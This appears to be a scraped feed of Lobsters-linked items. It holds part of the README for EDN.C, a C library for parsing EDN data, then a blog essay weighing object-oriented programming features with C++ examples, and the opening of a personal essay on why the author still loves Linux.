{:query """
    SELECT *
      FROM users
    WHERE age > 21
    """}

Features:

  • Automatic indentation stripping (common leading whitespace removed)
  • Closing """ position determines base indentation level
  • Closing on own line adds trailing newline, on same line doesn't
  • Trailing whitespace automatically removed from each line
  • Minimal escaping: only \""" to include literal triple quotes
  • Returns standard EDN string (no special type needed)

Example:

#include "edn.h"
#include <stdio.h>

int main(void) {
    const char* input =
        "{:sql \"\"\"\n"
        "       SELECT * FROM users\n"
        "       WHERE age > 21\n"
        "       ORDER BY name\n"
        "       \"\"\""}";

    edn_result_t result = edn_read(input, 0);

    if (result.error == EDN_OK) {
        edn_result_t key = edn_read(":sql", 0);
        edn_value_t* val = edn_map_lookup(result.value, key.value);

        // Text block returns a regular string with indentation stripped
        size_t len;
        const char* sql = edn_string_get(val, &len);
        printf("%s\n", sql);
        // Output:
        // SELECT * FROM users
        // WHERE age > 21
        // ORDER BY name

        edn_free(key.value);
        edn_free(result.value);
    }

    return 0;
}

Indentation Rules (Java JEP 378) :

  1. Find minimum indentation across all non-blank lines
  2. Closing """ position also determines indentation
  3. Strip that amount from each line
  4. If closing """ is on its own line, add trailing \n
{:foo """
        line1
       line2
      line3
      """}

Result: {:foo " line1\n line2\nline3\n"} (min indent 6, trailing newline added)

{:foo """
        line1
       line2
      line3"""}

Result: {:foo " line1\n line2\nline3"} (min indent 6, no trailing newline)

Build Configuration:

This feature is disabled by default. To enable it:

Make:

make TEXT_BLOCKS=1

CMake:

cmake -DEDN_ENABLE_TEXT_BLOCKS=ON ..
make

When disabled (default):

  • """\n pattern is parsed as a regular string
  • No automatic indentation processing

Note: Text blocks are an experimental feature and not part of the official EDN specification.

See examples/example_text_block.c for more examples.

Examples

Interactive TUI Viewer

EDN.C includes an interactive terminal viewer for exploring EDN data:

# Build the TUI
make tui

# Explore data interactively
./examples/edn_tui data.edn

# Use arrow keys to navigate, Enter/Space to expand/collapse, q to quit

CLI Tool

EDN.C includes a command-line tool for parsing and pretty-printing EDN files:

# Build the CLI
make cli

# Parse and pretty-print a file
./examples/edn_cli data.edn

# Or from stdin
echo '{:name "Alice" :age 30}' | ./examples/edn_cli

Complete Working Example

#include "edn.h"
#include <stdio.h>
#include <string.h>

void print_value(edn_value_t *val, int indent) {
    for (int i = 0; i < indent; i++) printf("  ");
    
    switch (edn_type(val)) {
        case EDN_TYPE_NIL:
            printf("nil\n");
            break;
        case EDN_TYPE_BOOL: {
            bool b;
            edn_bool_get(val, &b);
            printf("%s\n", b ? "true" : "false");
            break;
        }
        case EDN_TYPE_INT: {
            int64_t num;
            edn_int64_get(val, &num);
            printf("%lld\n", (long long)num);
            break;
        }
        case EDN_TYPE_FLOAT: {
            double num;
            edn_double_get(val, &num);
            printf("%g\n", num);
            break;
        }
        case EDN_TYPE_STRING: {
            size_t len;
            const char *str = edn_string_get(val, &len);
            printf("\"%.*s\"\n", (int)len, str);
            break;
        }
        case EDN_TYPE_KEYWORD: {
            const char *name;
            size_t len;
            edn_keyword_get(val, NULL, NULL, &name, &len);
            printf(":%.*s\n", (int)len, name);
            break;
        }
        case EDN_TYPE_VECTOR: {
            printf("[\n");
            size_t count = edn_vector_count(val);
            for (size_t i = 0; i < count; i++) {
                print_value(edn_vector_get(val, i), indent + 1);
            }
            for (int i = 0; i < indent; i++) printf("  ");
            printf("]\n");
            break;
        }
        case EDN_TYPE_MAP: {
            printf("{\n");
            size_t count = edn_map_count(val);
            for (size_t i = 0; i < count; i++) {
                print_value(edn_map_get_key(val, i), indent + 1);
                print_value(edn_map_get_value(val, i), indent + 1);
            }
            for (int i = 0; i < indent; i++) printf("  ");
            printf("}\n");
            break;
        }
        default:
            printf("<other type>\n");
    }
}

int main(void) {
    const char *edn = 
        "{:users [{:name \"Alice\" :age 30}\n"
        "         {:name \"Bob\" :age 25}]\n"
        " :status :active}";
    
    edn_result_t result = edn_read(edn, 0);
    
    if (result.error != EDN_OK) {
        fprintf(stderr, "Error at %zu:%zu - %s\n",
                result.error_line, result.error_column, result.error_message);
        return 1;
    }
    
    printf("Parsed EDN structure:\n");
    print_value(result.value, 0);
    
    edn_free(result.value);
    return 0;
}

More examples available in the examples/ directory.

Building

Standard Build (Unix/macOS/Linux)

# Build library (libedn.a)
make

# Build and run all tests
make test

# Build and run single test
make test/test_numbers
./test/test_numbers

# Build with debug symbols and sanitizers (ASAN/UBSAN)
make DEBUG=1

# Run benchmarks
make bench          # Quick benchmark
make bench-all      # All benchmarks

# Clean build artifacts
make clean

# Show build configuration
make info

Windows Build

EDN.C fully supports Windows with MSVC, MinGW, and Clang. Choose your preferred method:

Quick Start (CMake - Recommended):

# Using the provided build script
.\build.bat

# Or with PowerShell
.\build.ps1 -Test

Manual CMake Build:

mkdir build
cd build
cmake .. -DCMAKE_BUILD_TYPE=Release
cmake --build . --config Release
ctest -C Release

Visual Studio:

  • Open CMakeLists.txt in Visual Studio 2019+
  • Build → Build All (Ctrl+Shift+B)

For detailed Windows build instructions, see docs/WINDOWS.md .

Build Options

Standard options:

  • DEBUG=1 - Enable debug symbols, ASAN, and UBSAN
  • SANITIZE=1 - Enable sanitizers without full debug build
  • OPTIMIZE=0 - Disable optimizations
  • VERBOSE=1 - Show full compiler commands

Optional EDN features (disabled by default):

  • MAP_NAMESPACE_SYNTAX=1 - Enable #:ns{...} map namespace syntax
  • EXTENDED_CHARACTERS=1 - Enable \formfeed , \backspace , \oNNN octal escapes
  • METADATA=1 - Enable Clojure-style metadata ^{...} syntax
  • TEXT_BLOCKS=1 - Enable Java-style text blocks """\n...\n"""
  • RATIO=1 - Enable ratio numbers 22/7
  • EXTENDED_INTEGERS=1 - Enable hex ( 0xFF ), octal ( 0777 ), binary ( 2r1010 ), and radix ( 36rZZ ) formats
  • UNDERSCORE_IN_NUMERIC=1 - Enable underscores in numeric literals 1_000_000

Example:

# Build with metadata and ratio support
make METADATA=1 RATIO=1

Code Formatting

# Auto-format all C files (run before committing!)
make format

# Check if formatting is needed without modifying
make format-check

LSP Support

# Generate compile_commands.json for LSP (requires bear or compiledb)
make compile-commands

Performance

EDN.C is designed for high performance with several optimizations:

  • SIMD acceleration : Vectorized whitespace scanning, comment skipping, and identifier parsing
  • Zero-copy strings : String values without escapes point directly into input buffer
  • Lazy decoding : Escape sequences decoded only when accessed via edn_string_get()
  • Arena allocation : Single bulk allocation and deallocation eliminates malloc overhead
  • Efficient collections : Maps and sets use sorted arrays with binary search

Typical performance on Apple M1 (from microbenchmarks):

  • Whitespace skipping: 1-5 ns per operation
  • Number parsing: 10-30 ns per number
  • String parsing: 15-50 ns per string
  • Identifier parsing: 10-25 ns per symbol/keyword

See bench/ directory for detailed benchmarking tools and results.

Project Status

Current version : 1.0.0 (Release Candidate)

Complete features:

  • Full EDN specification support
  • All scalar types (nil, bool, int, bigint, float, character, string, symbol, keyword)
  • All collection types (lists, vectors, maps, sets)
  • Tagged literals with custom reader support
  • Discard forms #_
  • Comments ( ; line comments)
  • Duplicate detection for maps/sets
  • Deep structural equality
  • SIMD optimization for ARM64 (NEON) and x86_64 (SSE4.2)
  • Cross-platform support (Unix, macOS, Linux, Windows)
  • Optional Clojure extensions (disabled by default):
    • Map namespace syntax #:ns{...}
    • Extended character literals ( \formfeed , \backspace , \oNNN )
    • Metadata ^{...} syntax

Testing:

  • 340+ tests across 24 test suites
  • Memory safety verified with ASAN/UBSAN
  • Edge case coverage (empty collections, deeply nested structures, Unicode, etc.)

📋 Roadmap:

  • Performance profiling and further optimization
  • Extended documentation and tutorials
  • Streaming/Incremental parsing
  • Additional SIMD Platform Support:
    • 32-bit x86 (i386/i686): __i386__, _M_IX86; mostly the same as x86-64
    • 32-bit ARM (ARMv7): __arm__, _M_ARM; mostly the same as ARM64 NEON
    • RISC-V Vector Extension (RVV): __riscv, __riscv_vector; uses <riscv_vector.h>
  • Extra features:
    • float trailing dot ("1." => 1.0, "1.M" => 1.0M)
    • octal escape ("\176" => "~")

Contributing

Contributions are welcome! Please:

  1. Run make format before committing (auto-formats with clang-format)
  2. Ensure all tests pass with make test
  3. Add tests for new features
  4. Follow the existing code style (K&R, 4 spaces, C11, see .clang-format )

Documentation

License

MIT License

Copyright (c) 2025 [Kirill Chernyshov]

Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions:

The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software.

THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.

Acknowledgments

  • EDN specification: https://github.com/edn-format/edn
  • Inspired by Clojure's EDN implementation
  • Benchmark files from fast-edn
  • SWAR (SIMD Within A Register) digit parsing technique from simdjson
  • Fast double parsing using Clinger's algorithm (William D. Clinger, 1990) - "How to Read Floating Point Numbers Accurately"
  • SIMD optimization patterns from high-performance JSON parsers (simdjson, yyjson)

Questions or issues? Please open an issue on GitHub or consult the documentation in the docs/ directory.

Fifty Shades of OOP

Lobsters
lesleylai.info
2025-11-24 09:38:48
Comments...
Original Article

OOP-bashing seems fashionable nowadays. I decided to write this article after seeing two OOP-related articles on Lobsters in quick succession. I’m not interested in defending or attacking OOP, but I do want to throw in my two cents and offer a more nuanced view.

The industry and the academy have used the term “object-oriented” to mean so many different things. One thing that makes conversations around OOP so unproductive is the lack of consensus on what OOP is.

What is Object-Oriented Programming? Wikipedia defines it as “a programming paradigm based on the concept of objects.” This definition is unsatisfactory, as it requires a definition of an “object” and fails to encompass the disparate ways the term is used in the industry. There is also Alan Kay’s vision of OOP . However, the way most people use the term has drifted away from that vision, and I don’t want to fall into essentialism or etymological fallacy by insisting on a “true” meaning.

Instead, I think it is better to treat OOP as a mixed bag of interrelated ideas and examine them individually. Below, I will survey some ideas related to OOP and mention their pros and cons (in my subjective mind).

Classes

Object-oriented programming is a method of implementation in which programs are organized as cooperative collections of objects, each of which represents an instance of some class, and whose classes are all members of a hierarchy of classes united via inheritance relationships. — Grady Booch

Classes extend the idea of a “struct” or “record” with support for the method syntax, information hiding, and inheritance. We will talk about those specific features later.

Classes can also be viewed as blueprints for objects. They are not the only way to do that: prototypes are an alternative, pioneered by Self and, most famously, used by JavaScript. Personally, I feel that prototypes are harder to wrap one’s head around than classes. Even JavaScript tries to hide its use of prototypes from newcomers with ES6 classes.

Method Syntax

In Japanese, we have sentence chaining, which is similar to method chaining in Ruby — Yukihiro Matsumoto

The method syntax is one of the less controversial OOP features. It captures common programming use cases involving operations on a specific subject. Even in languages without methods, it is common to see functions effectively serve as methods by taking the relevant data as their first argument (or last, in languages with currying).

The syntax involves method definitions and method calls. Usually, languages supporting methods have both, unless you consider the “pipe operators” in functional languages as a form of method call.

The method call syntax aids IDE autocompletion, and method chaining is often more ergonomic than nested function calls (similar to the pipe operator in functional languages).

There are some debatable aspects of the method syntax, too. First, in many languages, methods are often not definable outside of a class, which causes a power imbalance compared to functions. There are certain exceptions, such as Rust (methods are always defined outside of the struct), Scala, Kotlin, and C# (extension methods).

Second, in many languages, this or self is implicit. This keeps the code more concise, but it can also introduce confusion and increase the risk of accidental name shadowing. Another drawback of an implicit this is that it is always passed as a pointer, and its type cannot be changed. This means you cannot pass it as a copy, and sometimes this indirection leads to performance issues. More importantly, because the type of this is fixed, you cannot write generic functions that accept different this types. Python and Rust got this right from the start, and C++ just fixed this issue in C++23 with deducing this .

Third, in languages with both “free functions” and methods, they become two incompatible ways to do the same thing. This can cause problems in generic code. Rust addresses this issue by allowing fully qualifying a method name and treating it as a function .
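
To make that concrete, here is a minimal Rust sketch (the type and method names are mine, not from any particular library) showing the same method invoked both with method-call syntax and as a fully qualified function:

struct Counter { n: u32 }

impl Counter {
    fn bump(&mut self) { self.n += 1; }
}

fn main() {
    let mut c = Counter { n: 0 };
    c.bump();              // method-call syntax
    Counter::bump(&mut c); // the same method, fully qualified and called like a plain function
    assert_eq!(c.n, 2);
}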

Fourth, the dot notation is used for both instance variable accesses and method calls in most languages. This is an intentional choice to make methods look more uniform with objects. In certain dynamically typed languages where methods are instance variables , this is fine and pretty much not even a choice. On the other hand, in languages like C++ or Java, this can cause confusion and shadowing problems.

Information Hiding

Its interface or definition was chosen to reveal as little as possible about its inner workings — [Parnas, 1972b]

In Smalltalk, no instance variables are directly accessible from outside the object, while all methods are exposed. More modern OOP languages support information hiding via access specifiers like private at the class level. Even non-OOP languages usually support information hiding in some way, be it module systems, opaque types, or even C’s header separation.

Information hiding is a good way to prevent invariants from being violated. It is also a good way to separate frequently changing implementation details from a stable interface.
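
For the non-OOP flavor of this idea, here is a minimal Rust sketch (the module and names are illustrative) where a module, rather than a class, hides the field that carries the invariant:

mod counter {
    pub struct Counter {
        value: u32, // private: outside code cannot break the invariant directly
    }

    impl Counter {
        pub fn new() -> Self { Counter { value: 0 } }
        pub fn increment(&mut self) { self.value += 1; }
        pub fn value(&self) -> u32 { self.value }
    }
}

fn main() {
    let mut c = counter::Counter::new();
    c.increment();
    // c.value = 99; // would not compile: the field is private to the module
    println!("{}", c.value());
}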

Nevertheless, aggressively hiding information may cause unnecessary boilerplate or abstraction inversion . Another criticism comes from functional programmers, who argue that you don’t need to maintain invariants, and thus don’t need much information hiding, if data is immutable . And, in a sense, OOP encourages people to write mutable objects whose invariants must be maintained.

Information hiding also encourages people to create small, self-contained objects that “know how to handle themselves,” which leads directly into the topic of encapsulation.

Encapsulation

If you can, just move all of that behavior into the class it helps. After all, OOP is about letting objects take care of themselves. — Bob Nystrom, Game Programming Patterns

Encapsulation is often confused with information hiding, but the two are distinct. Encapsulation refers to bundling data with the functions that operate on it. OOP languages directly support encapsulation with classes and the method syntax, but there are other approaches (e.g., the module system in OCaml ).

Data-oriented design has a lot to say about bundling data and functionality. When many objects exist, it is often much more efficient to process them in batches rather than individually. Having small objects with distinct behaviors can lead to poor data locality, more indirection, and fewer opportunities for parallelism. Of course, advocates of data-oriented design don’t reject encapsulation outright, but they encourage a more coarse-grained form of it, organized around how the code is actually used rather than how the domain model is conceptually structured .

Interfaces

“No part of a complex system should depend on the internal details of any other part.” — Daniel, Ingalls. “ The Smalltalk-76 Programming System Design and Implementation

Separation of interface and implementation is an old idea closely related to information hiding, encapsulation, and abstract data type . In some sense, even C’s header files can be considered an interface, but OOP usage of “interface” most often refers to a specific set of language constructs that support polymorphism (typically implemented via inheritance). Usually, an interface can’t contain data, and in more restricted languages (e.g., early versions of Java), they can’t contain method implementations either. The same idea of an interface is also common in non-OOP languages: Haskell type classes, Rust traits, and Go interfaces all serve the role of specifying an abstract set of operations independent of implementations.

Interfaces are often considered a simpler, more disciplined alternative to full-blown class inheritance. They are a single-purpose feature and don’t suffer from the diamond problem that plagues multiple inheritance.

Interfaces are also extremely useful in combination with parametric polymorphism , since they allow you to constrain the operations a type parameter must support. Dynamically typed languages (and C++/D templates) achieve something similar through duck-typing , but even languages with duck typing later introduced interface constructs to express constraints more explicitly (e.g., C++ concepts or TypeScript interfaces).

Interfaces as implemented in OOP languages often have a runtime cost, but that’s not always the case. For example, C++ concepts work only at compile time, and Rust traits offer only opt-in runtime polymorphism via dyn .
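
A minimal Rust sketch of that opt-in distinction (the trait and type are made up for illustration): the generic function is monomorphized at compile time, while the dyn version dispatches through a vtable at runtime.

trait Shape {
    fn area(&self) -> f64;
}

struct Circle { r: f64 }

impl Shape for Circle {
    fn area(&self) -> f64 { std::f64::consts::PI * self.r * self.r }
}

// Monomorphized per concrete type: no runtime dispatch.
fn print_area_static<S: Shape>(shape: &S) {
    println!("{}", shape.area());
}

// Opt-in runtime polymorphism through a trait object.
fn print_area_dyn(shape: &dyn Shape) {
    println!("{}", shape.area());
}

fn main() {
    let c = Circle { r: 1.0 };
    print_area_static(&c);
    print_area_dyn(&c);
}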

Late Binding

OOP to me means only messaging, local retention and protection and hiding of state-process, and extreme late-binding of all things — Alan Kay

Late binding refers to delaying the lookup of a method or a member until runtime. It is the default in most dynamically typed languages, where method calls are often implemented as a hash table lookup, but it can also be achieved by other means, such as dynamic loading or function pointers.

A key aspect of late binding is that behaviour can be changed while the software is still running, enabling all kinds of hot-reloading and monkey-patching workflows.

The downside of late binding is its non-trivial performance cost. Moreover, it can also be a footgun for breaking invariants or even interface mismatches. Its mutable nature can also introduce subtler issues, for example, the “late binding closures” pitfall in Python.

Dynamic Dispatch

A programming paradigm in C++ using Polymorphism based on runtime function dispatch using virtual functions — Back to Basics: Object-Oriented Programming - Jon Kalb - CppCon 2019

A concept related to late binding is dynamic dispatch, in which the implementation of a polymorphic operation is selected at runtime. The two concepts overlap, though dynamic dispatch focuses more on selecting multiple known polymorphic operations rather than on name lookup.

In a dynamically typed language, dynamic dispatch is the default since everything is late-bound. In statically typed languages, it is usually implemented as a virtual function table that looks something like this under the hood:

struct VTable {
    // function pointer to destroy the base
    void (*destroy)(Base&);

    // function pointer to one method implementation
    void (*foo)();

    // function pointer to another method implementation
    int (*bar)(int);
};

struct BaseClass {
    VTable* vtable;
};

These languages also provide compile-time guarantees that the vtable contains valid operations for the type.

Dynamic dispatch can be decoupled from inheritance, whether by manually implementing a v-table (e.g., C++‘s “type-erased types” such as std::function ) or via interface/trait/typeclass constructs. When not paired with inheritance, dynamic dispatch alone is usually not considered “OOP.”

Another thing to note is that the pointer to the v-table can be directly inside the object (e.g., C++) or embedded in “fat pointers” (e.g., Go and Rust).
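
You can observe the fat-pointer layout directly in Rust; in this small sketch (the trait is illustrative), a trait-object reference is twice the size of a plain reference because it carries a vtable pointer alongside the data pointer:

use std::mem::size_of;

trait Greet {
    fn hi(&self);
}

fn main() {
    // A plain reference is a single (thin) pointer.
    println!("&u8:        {} bytes", size_of::<&u8>());
    // A trait-object reference is a fat pointer: data pointer + vtable pointer.
    println!("&dyn Greet: {} bytes", size_of::<&dyn Greet>());
    assert_eq!(size_of::<&dyn Greet>(), 2 * size_of::<usize>());
}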

Complaints about dynamic dispatch are usually about its performance. Although a virtual function call itself can be pretty fast, it opens room for missing compiler inlining opportunities, cache misses, and branch mispredictions .

Inheritance

programming using class hierarchies and virtual functions to allow manipulation of objects of a variety of types through well-defined interfaces and to allow a program to be extended incrementally through derivation — Bjarne Stroustrup

Inheritance has a long history, dating back to Simula 67 . It is probably the most iconic feature of OOP. Almost every language marketed as “object-oriented” includes it, while languages that avoid OOP typically omit it.

It can be damn convenient . In many cases, using an alternative approach will result in significantly more boilerplate.

On the other hand, inheritance is a very non-orthogonal feature. It is a single mechanism that enables dynamic dispatch, subtyping polymorphism, interface/implementation segregation, and code reuse. It is flexible, though that flexibility makes it easy to misuse. For that reason, some languages nowadays replace it with more restrictive alternative constructs.

There are some other problems with inheritance. First, using inheritance almost certainly means you are paying the performance cost of dynamic dispatch and heap allocation. In some languages, such as C++, you can use inheritance without dynamic dispatch and heap allocation, and there are some valid use cases (e.g., code reuse with CRTP ), but the majority of uses of inheritance are for runtime polymorphism (and thus rely on dynamic dispatch).

Second, inheritance implements subtyping in an unsound way, requiring programmers to manually enforce the Liskov substitution principle .

Finally, inheritance hierarchies are rigid. They suffer from issues like the diamond problem, and that inflexibility is one of the main reasons people prefer composition over inheritance. The component pattern chapter of Game Programming Patterns provides a good example.

Subtyping Polymorphism

If for each object of type there is another object of type such that for all programs defined in terms of , the behavior of is unchanged when is substituted for , then is a subtype of . — Barbara Liskov, “ Data Abstraction and Hierarchy

Subtyping describes an “is a” relation between two types. The Liskov substitution principle defines the property that safe subtyping relationships must uphold.

OOP languages often support subtyping via inheritance, but note that inheritance doesn’t always model subtyping, and it is not the only form of subtyping either. Various interface/trait constructs in non-OOP languages often support subtyping. And besides nominal subtyping , where one explicitly declares the subtyping relationship, there is also structural subtyping , where the subtyping is implicit if one type contains all the features of another type. Good examples of structural subtyping include OCaml (objects and polymorphic variants) and TypeScript interfaces. Subtyping also shows up in all kinds of little places, such as Rust lifetimes and TypeScript’s coercion from a non-nullable type to its nullable counterpart.
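
The Rust lifetime case is worth a tiny sketch (the function name is mine): a &'static str can be passed wherever a shorter-lived &'a str is expected, because 'static is a subtype of every other lifetime.

fn print_once<'a>(s: &'a str) {
    println!("{}", s);
}

fn main() {
    let forever: &'static str = "hello";
    // &'static str coerces to &'a str for any 'a: lifetime subtyping at work.
    print_once(forever);
}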

A related concept to subtyping is variance (not related to class invariants), which bridges parametric polymorphism and subtyping. I won’t try to explain variance here, as the topic probably needs an entire blog post to cover well. It is a great ergonomic boost (e.g., C++ pointers would be unusable for polymorphic use if they were not covariant), but most languages only implement a limited, hard-coded version, because variance is hard to understand and error-prone. In particular, mutable data types usually should be invariant, and Java/C#’s covariant arrays are a prime example of getting this wrong. A few languages, including Scala and Kotlin , let programmers control variance explicitly.

Type conversion via subtyping relationships is often implicit. Implicit conversion has a bad reputation, though doing it through subtyping is ergonomic and is probably the least surprising kind of implicit conversion. Another way to view subtyping is as the dual of implicit conversion: we can “fake” a subtyping relation with an implicit conversion. For example, C++ templated types are invariant, but std::unique_ptr achieves covariance with an implicit conversion from std::unique_ptr<Derived> to std::unique_ptr<Base> . Does Go Have Subtyping? is a good article to further explore this idea.

One reason that language designers often try to avoid subtyping is the implementation complexity. Integrating bidirectional type inference and subtyping is notoriously difficult. Stephen Dolan’s 2016 thesis Algebraic Subtyping makes good progress addressing this issue.

Message Passing

I thought of objects being like biological cells and/or individual computers on a network, only able to communicate with messages — Alan Kay

Message passing means structuring execution around objects that send each other “messages.” It is the central theme of Alan Kay’s vision of OOP, though the definition can be pretty vague. An important point is that message names are late-bound, and the structures of these messages are not necessarily fixed at compile time.

Many early object-oriented concepts were influenced by distributed and simulation systems, where message passing is natural. However, in an era when most people worked on single-threaded code, message passing was gradually forgotten in languages such as C++ and Java. The method syntax offers only limited benefit compared to the original message-passing idea (Bjarne Stroustrup was certainly aware of the idea from Simula, but there were practical constraints on making it fast). Genuine message passing survived, but only in specific areas such as inter-process communication or highly event-driven systems.

Message passing is enjoying a renaissance in concurrent programming, ironically through non-OOP languages like Erlang and Go, with constructs such as actors and channels. This kind of shared-nothing concurrency removes a whole range of data races and race condition bugs. In combination with supervision, actors also provide fault tolerance, so that the failure of one actor does not bring down the entire program.
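
Here is a rough Rust sketch of the channel flavor of this idea, using the standard library’s mpsc channel (the worker logic is invented for illustration); the only way to interact with the worker is to send it messages, so there is no shared mutable state to race on:

use std::sync::mpsc;
use std::thread;

fn main() {
    let (tx, rx) = mpsc::channel();

    // The worker owns its state; other threads can only send it messages.
    let worker = thread::spawn(move || {
        let mut total: u64 = 0;
        for n in rx {
            total += n;
        }
        total // returned once the channel closes
    });

    for n in 1..=10u64 {
        tx.send(n).unwrap();
    }
    drop(tx); // close the channel so the worker's loop ends

    println!("sum = {}", worker.join().unwrap());
}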

Open-recursion

Originating in the famous Types and Programming Languages , open recursion is probably the least well-known and understood term in this blog post. Nevertheless, it just describes a familiar property of object-oriented systems: methods for an object can call each other, even if they are defined in different classes in the inheritance hierarchy.

The term is somewhat misleading, as there may not be recursive function calls, but here “recursion” means “mutually recursive.” The word “open” refers to “open to extension,” typically empowered by inheritance.

It’s easiest to see with an example:

struct Animal {
    void print_name() const {
        // Note that we call `name` here, although it is not defined in Animal
        std::print("{}\n", name());
    }

    virtual std::string name() const = 0;
};

struct Cat: Animal {
    std::string name() const override {
        return "Kitty";
    }
};

int main() {
    Cat cat;
    // note we call print_name here, although it is not defined in Cat
    cat.print_name();
}

For anyone with some familiarity with OOP, we probably take open recursion for granted, even though we may not be aware of its name. But not all language constructs have this property. For example, in many languages, functions are not mutually recursive by default:

// This won't compile in C++ because `name` is not defined
void print_name(const Animal& animal) {
    return name(animal);
}

std::string name(const Cat& cat) {
    return "Kitty";
}

Now, in languages with late-bound functions, functions in the same module can always call each other (e.g., Python, JavaScript). There are other languages where functions are mutually recursive by default (e.g., Rust), or have forward declarations (C) or a letrec construct (Scheme and ML family) to make functions mutually recursive. This solves the “recursion” part, but still not the “open” part yet:

std::string name(const Cat& cat);

void print_name(const Animal& animal) {
    // This still won't compile because we can't downcast an Animal to a Cat
    return name(animal);
}

std::string name(const Cat& cat) {
    return "Kitty";
}

Let’s fix this problem by using a callback:

struct Animal {
    std::function<std::string()> get_name;

    void print_name() const {
        std::print("{}\n", get_name());
    }
};

Animal make_cat() {
    return Animal {
        .get_name = []() { return "Kitty"; },
    };
}

int main() {
    Animal cat = make_cat();
    cat.print_name();
}

Tada, we just reinvented prototype-style dispatch!

Anyway, with my quick example above, I want to show that open recursion is a property that OOP gives you for free, but reproducing it in languages without built-in support can be tricky. Open recursion allows interdependent parts of an object to be defined separately, and this property is used in many places; for example, the entire idea of the decorator pattern depends on open recursion.

OOP Best Practices

Perhaps the more common complaints about OOP are not about specific language features, but rather about the programming styles it encourages. Many practices are taught as universal best practices, sometimes with rationales, but their downsides are often omitted. Some examples that come to mind:

Practice: preferring polymorphism over tagged unions/if/switch/pattern matching
  Advantages: open to extension; easier to add new cases.
  Disadvantages: performance hit; related behaviors get scattered across multiple places; harder to see the whole control flow in one place.

Practice: making all data members private
  Advantages: protects class invariants.
  Disadvantages: more boilerplate; often unnecessary to hide data that has no invariants; getter/setter pairs work less well than direct access in languages without property syntax.

Practice: preferring small “self-managed” objects over central “managers”
  Advantages: harder to violate invariants; cleaner code organization.
  Disadvantages: potentially poor data locality; missed parallelism opportunities; duplicated references to common data (“back pointers”).

Practice: preferring extension over modification
  Advantages: prevents new features from breaking old ones; prevents API breaks.
  Disadvantages: no reason to “close” a non-public module whose usage you own; leads to unnecessary complexity and inheritance chains; poorly designed interfaces never get fixed; can cause abstraction inversion.

Practice: preferring abstraction over concrete implementations
  Advantages: makes more of the system swappable and testable.
  Disadvantages: overuse sacrifices readability and debuggability; extra indirection has a performance cost.

This blog post is long enough, so I will not go into more details. Feel free to disagree with my “advantages and disadvantages”. What I want to convey is that almost all those practices come with trade-offs.

In the End

Congratulations on making it to the end of this article! There are other topics I’d love to discuss, such as RAII and design patterns. However, this article is long enough, so I will leave those for you to explore on your own.

Why I (still) love Linux

Lobsters
it-notes.dragas.net
2025-11-24 09:27:56
Comments...
Original Article

I know, this title might come as a surprise to many. Or perhaps, for those who truly know me, it won’t. I am not a fanboy. The BSDs and the illumos distributions generally follow an approach to design and development that aligns more closely with the way I think, not to mention the wonderful communities around them, but that does not mean I do not use and appreciate other solutions. I usually publish articles about how much I love the BSDs or illumos distributions, but today I want to talk about Linux (or, better, GNU/Linux) and why, despite everything, it still holds a place in my heart. This will be the first in a series of articles where I’ll discuss other operating systems.

Where It All Began

I started right here , with GNU/Linux, back in 1996. It was my first real prompt after the Commodore 64 and DOS. It was my first step toward Unix systems, and it was love at first shell. I felt a sense of freedom - a freedom that the operating systems I had known up to that point (few, to be honest) had never given me. It was like a “blank sheet” (or rather, a black one) with a prompt on it. I understood immediately that this prompt, thanks to command chaining, pipes, and all the marvels of Unix and Unix-like systems, would allow me to do anything. And that sense of freedom is what makes me love Unix systems to this day.

I was young, but my intuition was correct. And even though I couldn't afford to keep a full Linux installation on that computer long-term due to hardware limitations, I realized that this would be my future. A year later, a new computer arrived, allowing me to use Linux daily, for everything. And successfully, without missing Windows at all (except for a small partition, strictly for gaming).

When I arrived at university, in 1998, I was one of the few who knew it. One of the few who appreciated it. One of the few who hoped to see a flourishing future for it. Everywhere. Widespread. A dream come true. I was a speaker at Linux Days, I actively participated in translation projects, and I wrote articles for Italian magazines. I was a purist regarding the "GNU/Linux" nomenclature because I felt it was wrong to ignore the GNU part - it was fundamental. Because perhaps the "Year of the Linux Desktop" never arrived , but Linux is now everywhere. On my desktop, without a doubt. But also on my smartphone (Android) and on those of hundreds of millions of people. Just as it is in my car. And in countless devices surrounding us - even if we don’t know it. And this is the true success. Let’s not focus too much on the complaint that "it’s not compatible with my device X". It is your device that is not compatible with Linux, not the other way around. Just like when, many years ago, people complained that their WinModems (modems that offloaded all processing to obscure, closed-source Windows drivers) didn't work on Linux. For "early adopters" like me, this concept has always been present, even though, fortunately, things have improved exponentially.

Linux was what companies accepted most willingly (not totally, but still...): the ongoing lawsuits against the BSDs hampered their spread, and Linux seemed like that "breath of fresh air" the world needed.

Linux and its distributions (especially those untethered from corporations, like Debian, Gentoo, Arch, etc.) allowed us to replicate expensive "commercial" setups at a fraction of the cost. Reliability was good, updating was simple, and there was a certain consistency. Not as marked as that of the BSDs, but sufficient.

The world was ready to accept it, albeit reluctantly. Linus Torvalds, despite his sometimes harsh and undiplomatic tone, carried forward the kernel development with continuity and coherence, making difficult decisions but always in line with the project. The "move fast and break things" model was almost necessary because there was still so much to build. I also remember the era when Linux - speaking of the kernel - was designed almost exclusively for x86. The other architectures, to simplify, worked thanks to a series of adaptations that brought most behavior back to what was expected for x86.

